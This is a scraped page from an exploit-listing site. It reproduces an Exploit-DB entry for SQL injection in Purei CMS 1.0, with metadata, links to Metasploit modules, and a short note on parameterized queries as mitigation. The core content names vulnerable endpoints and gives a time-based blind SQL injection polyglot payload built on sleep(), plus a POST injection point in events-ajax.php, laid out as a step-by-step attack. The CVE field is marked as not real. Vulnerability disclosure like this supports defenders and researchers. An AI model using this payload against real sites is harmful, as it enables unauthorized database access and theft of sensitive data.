Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Purei CMS 1.0 - SQL Injection - exploit.company
header-logo
Suggest Exploit
vendor:
Purei CMS
by:
Number 7
8.1
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Purei CMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2024-XXXX (Not a real CVE)
CPE: cpe:2.3:a:purei:purei_cms:1.0
Metasploit:
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/smb/ms17_010_eternalbluehttps://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/drupal_restws_unserializehttps://www.infosecmatter.com/nessus-plugin-library/?id=147163https://www.infosecmatter.com/nessus-plugin-library/?id=136807https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/http/prtg_authenticated_rcehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/drupal_drupalgeddon2https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/thinkphp_rcehttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/smb/smb_enumshares
Platforms Tested: Linux
2024

Purei CMS 1.0 – SQL Injection

SQL injection vulnerability in Purei CMS 1.0 allows attackers to manipulate backend SQL statements by injecting malicious code through user inputs, potentially compromising the integrity of the database or exposing sensitive information.

Mitigation:

To mitigate this vulnerability, developers should use parameterized queries or prepared statements to sanitize user inputs and avoid direct concatenation of user input into SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Purei CMS 1.0 - SQL Injection
# Date: [27-03-2024]
# Exploit Author: [Number 7]
# Vendor Homepage: [purei.com]
# Version: [1.0]
# Tested on: [Linux]
____________________________________________________________________________________

Introduction:
An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation 
of user input. Such an injection transpires when web applications accept user input directly inserted 
into an SQL statement without effectively filtering out hazardous characters.

This could jeopardize the integrity of your database or reveal sensitive information.
____________________________________________________________________________________

Time-Based Blind SQL Injection:
Vulnerable files:
http://localhost/includes/getAllParks.php
http://localhost/includes/getSearchMap.php

make a POST request with the value of the am input set to :  

	if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ 

make sure to url encode the inputs.	
SQL injection:
Method: POST REQUEST

Vunerable file:

/includes/events-ajax.php?action=getMonth
data for the POST req:
month=3&type=&year=2024&cal_id=1[Inject Here]

Navigation

Suggest Exploit

Services By CQR